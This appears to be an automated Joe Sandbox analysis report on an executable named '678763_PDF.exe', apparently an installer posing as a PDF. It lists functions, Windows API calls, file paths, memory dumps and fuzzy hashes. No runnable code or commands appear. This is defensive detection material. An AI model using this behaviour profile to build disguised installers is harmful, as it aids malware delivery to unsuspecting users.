Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406094
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040607B
nsa, xrefs: 00406083

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\678763_PDF.exe"), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\erstatningsgraden,?,00000000,000000F0), ref: 00401652

Strings

C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 00401645

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\erstatningsgraden
API String ID: 1892508949-1967000036
Opcode ID: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
Opcode Fuzzy Hash: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E

Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108

Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
Opcode Fuzzy Hash: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D

Function 0040252F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsrBB8C.tmp,00000000,00000011,00000002), ref: 00402602

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: de231594f5fd9ed2f3d170b787f0c7ae88dddfe38e809d01203d2a2c86ad2b9e
Instruction ID: fa4e9c421320e09d3f2bb14c05bc69cdd2f01bdd483ca55c6e8c3e2e171c6fbc
Opcode Fuzzy Hash: de231594f5fd9ed2f3d170b787f0c7ae88dddfe38e809d01203d2a2c86ad2b9e
Instruction Fuzzy Hash: 11116A71900219EBDB14DFA0DA989AEB7B4FF04349B20447FE406B62C0D7B85A45EB5E

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C

Function 004056AF Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004056BF

Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

CoUninitialize.COMBASE(00000404,00000000), ref: 0040570B

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
Instruction ID: 02e921673ef7eca27cac182cfb7c492375eb89174892ab9280a6a273fd68093a
Opcode Fuzzy Hash: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
Instruction Fuzzy Hash: 62F0F0728006009BE7011794AE01B9773A4EBC5316F15543BFF89632A0CB3658018B5D

Function 00405AAB Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED
GetLastError.KERNEL32 ref: 00405AFB

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9

Function 00401EE3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401F01
EnableWindow.USER32(00000000,00000000), ref: 00401F0C

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 25d484baa04e9b6e4f62fc7871d61afe8f606dd1a39771946dafa5186f6494a1
Instruction ID: 5ff066b55785a601c9e0ac29068a23864f952070569c454aea33db173c3c2586
Opcode Fuzzy Hash: 25d484baa04e9b6e4f62fc7871d61afe8f606dd1a39771946dafa5186f6494a1
Instruction Fuzzy Hash: 29E09A369082048FE705EBA4AE494AEB3B4EB80325B200A7FE001F11C0CBB84C00966C

Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, ohowno",?), ref: 00405B63
CloseHandle.KERNEL32(?,?,?, ohowno",?), ref: 00405B70

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78

Function 00401578 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 0040158C
ShowWindow.USER32(?), ref: 004015A1

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
Instruction ID: ac0fea7dd280022ba88880c6e2ee8458450bfb5d79ff8b32edbe1086f76aca9f
Opcode Fuzzy Hash: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
Instruction Fuzzy Hash: 02E04F32B10114ABCB15DFA8FED08ADB3B6EB48320310143FD102B3690C775AD449B18

Function 0040694B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
GetProcAddress.KERNEL32(00000000,?), ref: 00406978

Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9

Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\678763_PDF.exe,80000000,00000003), ref: 0040604B
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694

Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19

Memory Dump Source

Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
